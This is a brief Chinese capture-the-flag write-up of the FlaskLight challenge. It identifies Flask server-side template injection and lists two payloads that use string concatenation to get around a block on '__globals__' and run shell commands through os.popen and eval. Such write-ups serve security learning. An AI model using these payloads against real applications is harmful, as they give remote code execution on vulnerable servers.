[CSCCTF 2019 Qual]FlaskLight
一眼丁真 flask的ssti
这道题几乎没怎么过滤 payload随便在网上扒就行了
但是不知道超级无敌脚本怎么会报错 只能手动去注入了
记录一下各种payload的吧 这道题如果直接用__globals__会报错可能是被屏蔽了,通过拼接绕过就行了
这些是比较简单的payload:
?search={{config.__init__['__global'+'s__'].os.popen("cmd").read()}}?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cmd').read()")}}